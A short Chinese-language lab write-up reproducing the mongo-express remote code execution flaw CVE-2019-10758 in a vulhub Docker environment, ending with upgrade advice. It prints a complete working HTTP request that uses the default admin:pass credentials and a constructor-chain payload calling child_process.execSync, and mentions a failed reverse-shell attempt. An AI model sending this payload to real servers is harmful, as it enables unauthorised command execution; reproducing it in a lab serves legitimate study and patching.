mongo-express 遠程代碼執行漏洞（CVE-2019-10758）

前言

mongo-express是一款mongodb的第三方Web界面，使用node和express開發。如果攻擊者可以成功登錄，或者目標服務器沒有修改默認的賬號密碼（admin:pass），則可以執行任意node.js代碼。

影響版本

mongo-express， 0.54.0 之前的版本

環境搭建

cd vulhub/mongo-express/CVE-2019-10758

docker-compose up -d

環境啓動後，訪問http://your-ip:8081即可查看到Web頁面。

漏洞復現

直接發送如下數據包，即可執行代碼this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")：

 

POST /checkValid HTTP/1.1

Host: your-ip

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Authorization: Basic YWRtaW46cGFzcw==

Content-Type: application/x-www-form-urlencoded

Content-Length: 124


document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")

反彈shell，無果

修復建議

升級mongo-express到0.54.0或更高版本。